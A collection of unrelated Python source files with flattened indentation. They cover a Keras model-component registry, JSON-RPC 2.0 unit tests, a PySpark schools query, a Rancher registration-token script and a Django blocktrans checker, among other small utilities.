import webapp2.api as API
API.menuItems = [
{ 'caption': 'Dashboard',
'icon': 'dashboard',
'route': '/dashboard'
},
{ 'caption': 'Administration',
'icon': 'settings',
'children': []
},
{ 'caption': 'Feedback',
'icon': 'feedback',
'route': '/feedback'
}
]
|
import functools
import os
import struct
import typing
from collections import UserList
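# NOTE: Int8 (a one-byte integer wrapper used throughout ByteArray below) is
# assumed to be defined or imported elsewhere in this package; it is not part
# of this snippet.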
def to_bytearray_deco(func):
@functools.wraps(func)
def wrap(datatype):
packed = func(datatype)
array = ByteArray(packed)
return array
return wrap
def to_bytearray(data, little_endian=False, signed=False):
return to_bytearray_deco(lambda datatype: datatype)(data)
class ByteArray(UserList):
def __init__(self, iterable: typing.Iterable):
super().__init__()
self.data = []
if isinstance(iterable, ByteArray):
self.data = iterable.data
else:
for value in iterable:
self.data.append(Int8(value))
def __setitem__(self, key, value):
try:
if isinstance(key, slice):
start = key.start
stop = key.stop
if start is None:
start = 0
if stop is None:
stop = len(self.data) - 1
if len(value) > stop - start:
raise ValueError("Value is too long")
elif start < len(self.data) and stop < len(self.data):
for item_n, item in enumerate(value):
self[start + item_n] = item
else:
                    raise ValueError("Slice is out of range")
elif isinstance(value, Int8):
self.data[key] = value
else:
self.data[key] = Int8(value)
except IndexError:
            for _ in range(len(self.data), key):
                # Pad intermediate positions with Int8 zeros so every element
                # stays an Int8, consistent with the rest of the class
                self.data.append(Int8(0))
if isinstance(value, Int8):
self.data.append(value)
else:
self.data.append(Int8(value))
def __getitem__(self, item):
return self.data[item]
def to_bytes(self, reverse=False):
if reverse:
return bytes(self.data[::-1])
return bytes(self.data)
def encrypt(self, crypt):
encrypted = crypt.encrypt(bytes(self))
self.data = encrypted
def __repr__(self):
return str(bytes(self))
def __bytes__(self):
return struct.pack("!{}".format("b" * len(self.data)), *[int(i) for i in self.data])
def pad(self, pad_length):
self[len(self.data) - 1 + pad_length] = 0
    def append(self, item) -> None:
        # Items other than ByteArray are expected to expose .encode() (e.g. str);
        # wrap the encoded bytes in a ByteArray so .data is available below
        array = item if isinstance(item, ByteArray) else ByteArray(item.encode())
        self.data += array.data
@classmethod
def random(cls, length):
return cls(os.urandom(length))
def __hex__(self):
return bytes(self.data).hex()
def hex(self):
return bytes(self).hex()
@classmethod
def from_hex(cls, hex_data):
return cls(bytes.fromhex(hex_data))
def extend(self, other) -> None:
for item in other:
self.append(item)
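# Usage sketch (illustrative, not part of the original module; assumes Int8
# accepts small integers):
#
#     buf = ByteArray([1, 2, 3])
#     buf.pad(5)                 # zero-pad so the array holds 8 entries
#     raw = buf.to_bytes()       # b'\x01\x02\x03\x00\x00\x00\x00\x00'
#     same = ByteArray.from_hex(raw.hex())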
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Date : 2021-01-07 13:10:57
# @Author : Joe Gao (jeusgao@163.com)
from backend import keras, V_TF
from keras_bert.layers import MaskedGlobalMaxPool1D
from .graph_attention_layer import GraphAttention
from .models import base_embed, bert_base, get_model, nonmask_embed
from .optimizers import adam, adam_warmup, AdamEMA
from .tokenizers import tokenizer_zh, kwr_labeler, cls_labeler
from .callbacks import TrainingCallbacks, EvaluatingCallbacks
from .generators import spo_data_generator_train, data_generator_train, data_generator_pred
from .funcs import gather_words, get_square, init_truncated_normal
from .embedding import EmbedModel
from .layers import (
base_inputs,
NonMaskingLayer,
bi_gru,
dropout,
layer_normalization,
batch_normalization,
reshape,
)
from keras_metrics import (
categorical_precision,
categorical_recall,
categorical_f1_score,
binary_precision,
binary_recall,
binary_f1_score,
)
DIC_Inits = {
'truncated': {'func': init_truncated_normal}
}
DIC_Funcs = {
'gather_words': gather_words,
'get_square': get_square,
}
DIC_Losses = {
'categorical_crossentropy': {
'func': keras.losses.CategoricalCrossentropy(),
# 'params': {'from_logits': False},
},
'binarycrossentropy': {
'func': keras.losses.BinaryCrossentropy(),
# 'params': {'from_logits': False},
},
'sparse_categorical_crossentropy': {
'func': keras.losses.SparseCategoricalCrossentropy(),
}
}
DIC_Metrics = {
# 'categorical_precision': {'func': categorical_precision, 'params': {'label': 0}},
# 'categorical_recall': {'func': categorical_recall, 'params': {'label': 0}},
# 'categorical_f1_score': {'func': categorical_f1_score, 'params': {'label': 0}},
'accuracy': {'func': 'accuracy'},
'binary_accuracy': {'func': keras.metrics.BinaryAccuracy()},
'binary_precision': {'func': binary_precision()},
'binary_recall': {'func': binary_recall()},
'binary_f1_score': {'func': binary_f1_score()},
'categorical_accuracy': {'func': keras.metrics.CategoricalAccuracy()},
'precision': {'func': keras.metrics.Precision()},
'recall': {'func': keras.metrics.Recall()},
'sparse_categorical_accuracy': {'func': keras.metrics.SparseCategoricalAccuracy()},
}
DIC_Layers = {
# 'base_inputs': {'func': base_inputs},
'nonmasking_layer': {'func': NonMaskingLayer},
'input': {'func': keras.layers.Input, 'params': {'shape': (None,)}},
'dense': {'func': keras.layers.Dense, 'params': {'units': 64, 'activation': 'relu'}},
'lambda': {'func': keras.layers.Lambda, 'params': ''},
'bigru': {'func': bi_gru, 'params': {'units': 64, 'return_sequences': True, 'reset_after': True}},
'dropout': {'func': dropout, 'params': {'rate': 0.1}},
'masked_global_max_pool1D': {'func': MaskedGlobalMaxPool1D, 'params': {'name': 'Masked-Global-Pool-Max'}},
'layer_normalization': {'func': layer_normalization, 'params': {'axis': -1, 'epsilon': 0.001, }},
'batch_normalization': {'func': batch_normalization, 'params': {'axis': -1, 'epsilon': 0.001, }},
'reshape': {'func': reshape, 'params': [1, 1]}
}
if V_TF >= '2.2':
from .layers import KConditionalRandomField
kcrf = KConditionalRandomField()
DIC_Layers['kcrf'] = {'func': kcrf}
DIC_Losses['kcrf_loss'] = {'func': kcrf.loss}
DIC_Metrics['kcrf_accuracy'] = {'func': kcrf.accuracy}
else:
from keras_contrib.losses import crf_loss
from keras_contrib.metrics import crf_viterbi_accuracy as crf_accuracy
from .layers import crf
DIC_Layers['crf'] = {'func': crf, 'params': {'dim': 2}}
DIC_Losses['crf_loss'] = {'func': crf_loss}
DIC_Metrics['crf_accuracy'] = {'func': crf_accuracy}
DIC_Bases = {
'BERT': {
'func': bert_base,
'params': {
'fn_config': None,
'fn_base_model': None,
'training': False,
'trainable': False,
'seq_len': 512
}
},
}
DIC_Models = {
'base_embed': {'func': base_embed},
'nonmask_embed': {'func': nonmask_embed},
}
DIC_Optimizers = {
'adam': {'func': adam, 'params': {'lr': 1e-4}},
'adam_warmup': {
'func': adam_warmup,
'params': {
'len_data': 1000,
'batch_size': 128,
'epochs': 5,
'warmup_proportion': 0.1,
'lr': 1e-4,
'min_lr': 1e-5,
}
},
'AdamEMA': {
'func': AdamEMA,
'params': {
'learning_rate': 1e-6,
}
},
}
DIC_Tokenizers = {
'tokenizer_zh': {'func': tokenizer_zh, 'params': {'fn_vocab': None}},
}
DIC_Labelers = {
'kwr_labeler': {'func': kwr_labeler},
'cls_labeler': {'func': cls_labeler},
}
DIC_Generators_for_train = {
'spo_data_generator_train': {
'func': spo_data_generator_train,
'params': {
'data': None,
'Y': None,
'tokenizer': None,
'dim': 2,
'maxlen': 512,
'labeler': None,
'activation': 'sigmoid',
}
},
'data_generator_for_train': {
'func': data_generator_train,
'params': {
'data': None,
'Y': None,
'tokenizer': None,
'dim': 2,
'maxlen': 512,
'labeler': None,
'activation': 'sigmoid',
},
}
}
DIC_Generators_for_pred = {
'data_generator_for_pred': {
'func': data_generator_pred,
}
}
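# Usage sketch (illustrative helper, not part of the original module): a layer
# is looked up by name in DIC_Layers and instantiated from its 'func' plus any
# dict 'params', optionally overridden by the caller.
def _build_layer_example(name, **overrides):
    spec = DIC_Layers[name]
    params = spec.get('params')
    kwargs = dict(params) if isinstance(params, dict) else {}
    kwargs.update(overrides)
    return spec['func'](**kwargs)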
|
import json
import sys
from ..exceptions import JSONRPCInvalidRequestException, JSONRPCInvalidResponseException
from ..jsonrpc2 import (
JSONRPC20Request,
JSONRPC20BatchRequest,
JSONRPC20Response,
JSONRPC20BatchResponse,
)
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
class TestJSONRPC20Request(unittest.TestCase):
""" Test JSONRPC20Request functionality."""
def setUp(self):
self.request_params = {
"method": "add",
"params": [1, 2],
"_id": 1,
}
def test_correct_init(self):
""" Test object is created."""
JSONRPC20Request(**self.request_params)
def test_validation_incorrect_no_parameters(self):
with self.assertRaises(ValueError):
JSONRPC20Request()
def test_method_validation_str(self):
self.request_params.update({"method": "add"})
JSONRPC20Request(**self.request_params)
def test_method_validation_not_str(self):
self.request_params.update({"method": []})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
self.request_params.update({"method": {}})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
def test_method_validation_str_rpc_prefix(self):
""" Test method SHOULD NOT starts with rpc. """
self.request_params.update({"method": "rpc."})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
self.request_params.update({"method": "rpc.test"})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
self.request_params.update({"method": "rpccorrect"})
JSONRPC20Request(**self.request_params)
self.request_params.update({"method": "rpc"})
JSONRPC20Request(**self.request_params)
def test_params_validation_list(self):
self.request_params.update({"params": []})
JSONRPC20Request(**self.request_params)
self.request_params.update({"params": [0]})
JSONRPC20Request(**self.request_params)
def test_params_validation_tuple(self):
self.request_params.update({"params": ()})
JSONRPC20Request(**self.request_params)
self.request_params.update({"params": tuple([0])})
JSONRPC20Request(**self.request_params)
def test_params_validation_dict(self):
self.request_params.update({"params": {}})
JSONRPC20Request(**self.request_params)
self.request_params.update({"params": {"a": 0}})
JSONRPC20Request(**self.request_params)
def test_params_validation_none(self):
self.request_params.update({"params": None})
JSONRPC20Request(**self.request_params)
def test_params_validation_incorrect(self):
self.request_params.update({"params": "str"})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
def test_request_args(self):
self.assertEqual(JSONRPC20Request("add").args, ())
self.assertEqual(JSONRPC20Request("add", []).args, ())
self.assertEqual(JSONRPC20Request("add", {"a": 1}).args, ())
self.assertEqual(JSONRPC20Request("add", [1, 2]).args, (1, 2))
def test_request_kwargs(self):
self.assertEqual(JSONRPC20Request("add").kwargs, {})
self.assertEqual(JSONRPC20Request("add", [1, 2]).kwargs, {})
self.assertEqual(JSONRPC20Request("add", {}).kwargs, {})
self.assertEqual(JSONRPC20Request("add", {"a": 1}).kwargs, {"a": 1})
def test_id_validation_string(self):
self.request_params.update({"_id": "id"})
JSONRPC20Request(**self.request_params)
def test_id_validation_int(self):
self.request_params.update({"_id": 0})
JSONRPC20Request(**self.request_params)
def test_id_validation_null(self):
self.request_params.update({"_id": "null"})
JSONRPC20Request(**self.request_params)
def test_id_validation_none(self):
self.request_params.update({"_id": None})
JSONRPC20Request(**self.request_params)
def test_id_validation_float(self):
self.request_params.update({"_id": 0.1})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
def test_id_validation_incorrect(self):
self.request_params.update({"_id": []})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
self.request_params.update({"_id": ()})
with self.assertRaises(ValueError):
JSONRPC20Request(**self.request_params)
def test_data_method_1(self):
r = JSONRPC20Request("add")
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": None,
})
def test_data_method_2(self):
r = JSONRPC20Request(method="add")
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": None,
})
def test_data_method_3(self):
r = JSONRPC20Request("add", None)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": None,
})
def test_data_params_1(self):
r = JSONRPC20Request("add", params=None, _id=None)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": None,
})
def test_data_params_2(self):
r = JSONRPC20Request("add", [])
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"params": [],
"id": None,
})
def test_data_params_3(self):
r = JSONRPC20Request("add", ())
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"params": [],
"id": None,
})
def test_data_params_4(self):
r = JSONRPC20Request("add", (1, 2))
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"params": [1, 2],
"id": None,
})
def test_data_params_5(self):
r = JSONRPC20Request("add", {"a": 0})
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"params": {"a": 0},
"id": None,
})
def test_data_id_1(self):
r = JSONRPC20Request("add", _id="null")
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": "null",
})
def test_data_id_1_notification(self):
r = JSONRPC20Request("add", _id="null", is_notification=True)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
})
def test_data_id_2(self):
r = JSONRPC20Request("add", _id=None)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": None,
})
def test_data_id_2_notification(self):
r = JSONRPC20Request("add", _id=None, is_notification=True)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
})
def test_data_id_3(self):
r = JSONRPC20Request("add", _id="id")
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": "id",
})
def test_data_id_3_notification(self):
r = JSONRPC20Request("add", _id="id", is_notification=True)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
})
def test_data_id_4(self):
r = JSONRPC20Request("add", _id=0)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
"id": 0,
})
def test_data_id_4_notification(self):
r = JSONRPC20Request("add", _id=0, is_notification=True)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"method": "add",
})
def test_is_notification(self):
r = JSONRPC20Request("add")
self.assertFalse(r.is_notification)
r = JSONRPC20Request("add", _id=None)
self.assertFalse(r.is_notification)
r = JSONRPC20Request("add", _id="null")
self.assertFalse(r.is_notification)
r = JSONRPC20Request("add", _id=0)
self.assertFalse(r.is_notification)
r = JSONRPC20Request("add", is_notification=True)
self.assertTrue(r.is_notification)
r = JSONRPC20Request("add", is_notification=True, _id=None)
self.assertTrue(r.is_notification)
self.assertNotIn("id", r.data)
r = JSONRPC20Request("add", is_notification=True, _id=0)
self.assertTrue(r.is_notification)
self.assertNotIn("id", r.data)
def test_set_unset_notification_keep_id(self):
r = JSONRPC20Request("add", is_notification=True, _id=0)
self.assertTrue(r.is_notification)
self.assertFalse("id" in r.data)
r.is_notification = False
self.assertFalse(r.is_notification)
self.assertTrue("id" in r.data)
self.assertEqual(r.data["id"], 0)
    def test_serialize_method_1(self):
        r = JSONRPC20Request("add")
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "id": None,
        })
    def test_serialize_method_2(self):
        r = JSONRPC20Request(method="add")
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "id": None,
        })
    def test_serialize_method_3(self):
        r = JSONRPC20Request("add", None)
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "id": None,
        })
    def test_serialize_params_1(self):
        r = JSONRPC20Request("add", params=None, _id=None)
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "id": None,
        })
    def test_serialize_params_2(self):
        r = JSONRPC20Request("add", [])
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "params": [],
            "id": None,
        })
    def test_serialize_params_3(self):
        r = JSONRPC20Request("add", ())
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "params": [],
            "id": None,
        })
    def test_serialize_params_4(self):
        r = JSONRPC20Request("add", (1, 2))
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "params": [1, 2],
            "id": None,
        })
    def test_serialize_params_5(self):
        r = JSONRPC20Request("add", {"a": 0})
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "params": {"a": 0},
            "id": None,
        })
    def test_serialize_id_1(self):
        r = JSONRPC20Request("add", _id="null")
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "id": "null",
        })
    def test_serialize_id_2(self):
        r = JSONRPC20Request("add", _id=None)
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "id": None,
        })
    def test_serialize_id_3(self):
        r = JSONRPC20Request("add", _id="id")
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "id": "id",
        })
    def test_serialize_id_4(self):
        r = JSONRPC20Request("add", _id=0)
        self.assertEqual(json.loads(r.json), {
            "jsonrpc": "2.0",
            "method": "add",
            "id": 0,
        })
def test_from_json_request_no_id(self):
str_json = json.dumps({
"method": "add",
"params": [1, 2],
"jsonrpc": "2.0",
})
request = JSONRPC20Request.from_json(str_json)
self.assertTrue(isinstance(request, JSONRPC20Request))
self.assertEqual(request.method, "add")
self.assertEqual(request.params, [1, 2])
self.assertEqual(request._id, None)
self.assertTrue(request.is_notification)
def test_from_json_request_no_params(self):
str_json = json.dumps({
"method": "add",
"jsonrpc": "2.0",
})
request = JSONRPC20Request.from_json(str_json)
self.assertTrue(isinstance(request, JSONRPC20Request))
self.assertEqual(request.method, "add")
self.assertEqual(request.params, None)
self.assertEqual(request._id, None)
self.assertTrue(request.is_notification)
def test_from_json_request_null_id(self):
str_json = json.dumps({
"method": "add",
"jsonrpc": "2.0",
"id": None,
})
request = JSONRPC20Request.from_json(str_json)
self.assertTrue(isinstance(request, JSONRPC20Request))
self.assertEqual(request.method, "add")
self.assertEqual(request.params, None)
self.assertEqual(request._id, None)
self.assertFalse(request.is_notification)
def test_from_json_request(self):
str_json = json.dumps({
"method": "add",
"params": [0, 1],
"jsonrpc": "2.0",
"id": "id",
})
request = JSONRPC20Request.from_json(str_json)
self.assertTrue(isinstance(request, JSONRPC20Request))
self.assertEqual(request.method, "add")
self.assertEqual(request.params, [0, 1])
self.assertEqual(request._id, "id")
self.assertFalse(request.is_notification)
def test_from_json_invalid_request_jsonrpc(self):
str_json = json.dumps({
"method": "add",
})
with self.assertRaises(JSONRPCInvalidRequestException):
JSONRPC20Request.from_json(str_json)
def test_from_json_invalid_request_method(self):
str_json = json.dumps({
"jsonrpc": "2.0",
})
with self.assertRaises(JSONRPCInvalidRequestException):
JSONRPC20Request.from_json(str_json)
def test_from_json_invalid_request_extra_data(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"method": "add",
"is_notification": True,
})
with self.assertRaises(JSONRPCInvalidRequestException):
JSONRPC20Request.from_json(str_json)
def test_data_setter(self):
request = JSONRPC20Request(**self.request_params)
with self.assertRaises(ValueError):
request.data = []
with self.assertRaises(ValueError):
request.data = ""
with self.assertRaises(ValueError):
request.data = None
class TestJSONRPC20BatchRequest(unittest.TestCase):
""" Test JSONRPC20BatchRequest functionality."""
def test_batch_request(self):
request = JSONRPC20BatchRequest(
JSONRPC20Request("devide", {"num": 1, "denom": 2}, _id=1),
JSONRPC20Request("devide", {"num": 3, "denom": 2}, _id=2),
)
self.assertEqual(json.loads(request.json), [
{"method": "devide", "params": {"num": 1, "denom": 2}, "id": 1,
"jsonrpc": "2.0"},
{"method": "devide", "params": {"num": 3, "denom": 2}, "id": 2,
"jsonrpc": "2.0"},
])
def test_from_json_batch(self):
str_json = json.dumps([
{"method": "add", "params": [1, 2], "jsonrpc": "2.0"},
{"method": "mul", "params": [1, 2], "jsonrpc": "2.0"},
])
requests = JSONRPC20BatchRequest.from_json(str_json)
self.assertTrue(isinstance(requests, JSONRPC20BatchRequest))
for r in requests:
self.assertTrue(isinstance(r, JSONRPC20Request))
self.assertTrue(r.method in ["add", "mul"])
self.assertEqual(r.params, [1, 2])
self.assertEqual(r._id, None)
self.assertTrue(r.is_notification)
def test_from_json_batch_one(self):
str_json = json.dumps([
{"method": "add", "params": [1, 2], "jsonrpc": "2.0", "id": None},
])
requests = JSONRPC20Request.from_json(str_json)
self.assertTrue(isinstance(requests, JSONRPC20BatchRequest))
requests = list(requests)
self.assertEqual(len(requests), 1)
r = requests[0]
self.assertTrue(isinstance(r, JSONRPC20Request))
self.assertEqual(r.method, "add")
self.assertEqual(r.params, [1, 2])
self.assertEqual(r._id, None)
self.assertFalse(r.is_notification)
def test_response_iterator(self):
requests = JSONRPC20BatchRequest(
JSONRPC20Request("devide", {"num": 1, "denom": 2}, _id=1),
JSONRPC20Request("devide", {"num": 3, "denom": 2}, _id=2),
)
for request in requests:
self.assertTrue(isinstance(request, JSONRPC20Request))
self.assertEqual(request.method, "devide")
class TestJSONRPC20Response(unittest.TestCase):
""" Test JSONRPC20Response functionality."""
def setUp(self):
self.response_success_params = {
"result": "",
"_id": 1,
}
self.response_error_params = {
"error": {
"code": 1,
"message": "error",
},
"_id": 1,
}
def test_correct_init(self):
""" Test object is created."""
JSONRPC20Response(**self.response_success_params)
def test_validation_incorrect_no_parameters(self):
with self.assertRaises(ValueError):
JSONRPC20Response()
def test_validation_incorrect_result_and_error(self):
response = JSONRPC20Response(error={"code": 1, "message": ""})
with self.assertRaises(ValueError):
response.result = ""
def test_validation_error_correct(self):
JSONRPC20Response(**self.response_error_params)
def test_validation_error_incorrect(self):
self.response_error_params["error"].update({"code": "str"})
with self.assertRaises(ValueError):
JSONRPC20Response(**self.response_error_params)
def test_validation_error_incorrect_no_code(self):
del self.response_error_params["error"]["code"]
with self.assertRaises(ValueError):
JSONRPC20Response(**self.response_error_params)
def test_validation_error_incorrect_no_message(self):
del self.response_error_params["error"]["message"]
with self.assertRaises(ValueError):
JSONRPC20Response(**self.response_error_params)
def test_validation_error_incorrect_message_not_str(self):
self.response_error_params["error"].update({"message": 0})
with self.assertRaises(ValueError):
JSONRPC20Response(**self.response_error_params)
def test_validation_id(self):
response = JSONRPC20Response(**self.response_success_params)
self.assertEqual(response._id, self.response_success_params["_id"])
def test_validation_id_incorrect_type(self):
response = JSONRPC20Response(**self.response_success_params)
with self.assertRaises(ValueError):
response._id = []
with self.assertRaises(ValueError):
response._id = {}
with self.assertRaises(ValueError):
response._id = 0.1
def test_data_result(self):
r = JSONRPC20Response(result="")
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"result": "",
"id": None,
})
def test_data_result_id_none(self):
r = JSONRPC20Response(result="", _id=None)
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"result": "",
"id": None,
})
def test_data_result_id(self):
r = JSONRPC20Response(result="", _id=0)
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"result": "",
"id": 0,
})
def test_data_error(self):
r = JSONRPC20Response(error={"code": 0, "message": ""})
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"error": {
"code": 0,
"message": "",
},
"id": None,
})
def test_data_error_id_none(self):
r = JSONRPC20Response(error={"code": 0, "message": ""}, _id=None)
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"error": {
"code": 0,
"message": "",
},
"id": None,
})
def test_data_error_id(self):
r = JSONRPC20Response(error={"code": 0, "message": ""}, _id=0)
self.assertEqual(json.loads(r.json), r.data)
self.assertEqual(r.data, {
"jsonrpc": "2.0",
"error": {
"code": 0,
"message": "",
},
"id": 0,
})
def test_data_setter(self):
response = JSONRPC20Response(**self.response_success_params)
with self.assertRaises(ValueError):
response.data = []
with self.assertRaises(ValueError):
response.data = ""
with self.assertRaises(ValueError):
response.data = None
def test_from_json_invalid_response_jsonrpc(self):
str_json = json.dumps({
"result": None,
"id": 0,
})
with self.assertRaises(JSONRPCInvalidResponseException):
JSONRPC20Response.from_json(str_json)
def test_from_json_invalid_response_id(self):
str_json = json.dumps({
"result": None,
"jsonrpc": "2.0",
})
with self.assertRaises(JSONRPCInvalidResponseException):
JSONRPC20Response.from_json(str_json)
def test_from_json_invalid_response_no_result_error(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
})
with self.assertRaises(JSONRPCInvalidResponseException):
JSONRPC20Response.from_json(str_json)
def test_from_json_invalid_response_result_and_error(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
"result": None,
"error": {"code": 1, "message": ""}
})
with self.assertRaises(JSONRPCInvalidResponseException):
JSONRPC20Response.from_json(str_json)
def test_from_json_invalid_response_extra_data(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
"result": None,
"error": {"code": 1, "message": ""},
"extra-data": ""
})
with self.assertRaises(JSONRPCInvalidResponseException):
JSONRPC20Response.from_json(str_json)
def test_from_json_response_result_null(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
"result": None,
})
response = JSONRPC20Response.from_json(str_json)
self.assertIsInstance(response, JSONRPC20Response)
self.assertIsNone(response.result)
self.assertIsNone(response.error)
self.assertEqual(response._id, 0)
def test_from_json_response_result(self):
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
"result": [1, 2, 3],
})
response = JSONRPC20Response.from_json(str_json)
self.assertIsInstance(response, JSONRPC20Response)
self.assertEqual(response.result, [1, 2, 3])
self.assertIsNone(response.error)
self.assertEqual(response._id, 0)
def test_from_json_response_error(self):
error = {'code': 1, 'message': ''}
str_json = json.dumps({
"jsonrpc": "2.0",
"id": 0,
"error": error,
})
response = JSONRPC20Response.from_json(str_json)
self.assertIsInstance(response, JSONRPC20Response)
self.assertIsNone(response.result)
self.assertEqual(response.error, error)
self.assertEqual(response._id, 0)
class TestJSONRPC20BatchResponse(unittest.TestCase):
""" Test JSONRPC20BatchResponse functionality."""
def test_batch_response(self):
response = JSONRPC20BatchResponse(
JSONRPC20Response(result="result", _id=1),
JSONRPC20Response(error={"code": 0, "message": ""}, _id=2),
)
self.assertEqual(json.loads(response.json), [
{"result": "result", "id": 1, "jsonrpc": "2.0"},
{"error": {"code": 0, "message": ""}, "id": 2, "jsonrpc": "2.0"},
])
def test_response_iterator(self):
responses = JSONRPC20BatchResponse(
JSONRPC20Response(result="result", _id=1),
JSONRPC20Response(result="result", _id=2),
)
for response in responses:
self.assertTrue(isinstance(response, JSONRPC20Response))
self.assertEqual(response.result, "result")
def test_batch_response_data(self):
response = JSONRPC20BatchResponse(
JSONRPC20Response(result="result", _id=1),
JSONRPC20Response(result="result", _id=2),
JSONRPC20Response(result="result"),
)
self.assertEqual(response.data, [
{"id": 1, "jsonrpc": "2.0", "result": "result"},
{"id": 2, "jsonrpc": "2.0", "result": "result"},
{"id": None, "jsonrpc": "2.0", "result": "result"},
])
|
from pyspark.sql import SparkSession
from pyspark.sql.types import StructType, StructField, IntegerType, StringType
spark = SparkSession.builder.getOrCreate()
# For escuelasPR.csv file
school_schema = StructType([
StructField("school_region", StringType(), True),
StructField("school_district", StringType(), True),
StructField("city", StringType(), True),
StructField("school_id", IntegerType(), True),
StructField("school_name", StringType(), True),
StructField("school_level", StringType(), True),
StructField("college_board_id", IntegerType(), True)])
school_df = spark.read.csv(path="/user/jramirez/data/escuelasPR.csv", header=False, schema=school_schema)
# SQL
school_df.createOrReplaceTempView("school")
sql_query = "select school_region, school_district, city, count(*) as num_schools " \
"from school " \
"where school_region = 'Arecibo' " \
"group by school_region, school_district, city " \
"order by school_district"
spark.sql(sql_query).show()
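# Equivalent DataFrame API form of the SQL query above (a sketch; it reuses the
# school_df defined earlier in this script).
from pyspark.sql import functions as F
(school_df
    .filter(F.col("school_region") == "Arecibo")
    .groupBy("school_region", "school_district", "city")
    .agg(F.count(F.lit(1)).alias("num_schools"))
    .orderBy("school_district")
    .show())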
|
import requests
from config import bot_url, api_secret
from typing import List
_bot_headers = {
'authorization': f"Bearer srv.{api_secret}"
}
def _build_bot_url(path: str):
return f"{bot_url}{path}"
def bot_add_roles(user_id: str, guild_id: str, role_ids: List[str]):
r = requests.post(_build_bot_url("/add-roles"), json={
'user_id': user_id,
'guild_id': guild_id,
'role_ids': role_ids
    }, headers=_bot_headers)
    # Return the response so callers can inspect the status of the bot request
    return r
|
default_app_config = 'dcodex_carlson.apps.DcodexCarlsonConfig'
|
#!/usr/bin/env python
import sys
import requests
from cattle import from_env
url = sys.argv[1]
r = requests.get(url)
if r.status_code == 200 and r.text.startswith('#!/bin/sh'):
    print(url)
sys.exit(0)
r = requests.get(sys.argv[1])
try:
url = r.headers['X-API-Schemas']
except KeyError:
url = sys.argv[1]
client = from_env(url=url)
if not client.valid():
    print('Invalid client')
sys.exit(1)
if 'POST' not in client.schema.types['registrationToken'].collectionMethods:
projects = client.list_project(uuid='adminProject')
if len(projects) == 0:
        print('Failed to find admin resource group')
sys.exit(1)
client = from_env(url=projects[0].links['schemas'])
if not client.valid():
        print('Invalid client')
sys.exit(1)
tokens = client.list_registrationToken(state='active')
if len(tokens) == 0:
token = client.create_registrationToken()
else:
token = tokens[0]
token = client.wait_success(token)
print(token.registrationUrl)
|
from __future__ import (
absolute_import,
print_function,
unicode_literals,
)
import argparse
import io
def main(argv=None):
args = parse_args(argv)
dirtiness_results = {
check_and_report_file_blocktrans_dirtiness(filename)
for filename in args.filenames
}
    return 1 if any(dirtiness_results) else 0
def check_and_report_file_blocktrans_dirtiness(path):
dirty = has_dirty_blocktrans(path)
if dirty:
print(path)
return dirty
def has_dirty_blocktrans(path):
"""
Quick and dirty check for a multi-line blocktrans lacking a trimmed
directive.
A more solid approach would involve the Django HTML template parser, e.g.
see https://stackoverflow.com/a/24583004/392743
"""
with io.open(path, encoding='utf-8') as infile:
for line in infile:
if '{% blocktrans' in line and '{% endblocktrans' not in line:
if 'trimmed' not in line:
return True
return False
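# Illustrative example: a template line such as
#     {% blocktrans count counter=num %}
# opens a multi-line block without the `trimmed` option and would be reported,
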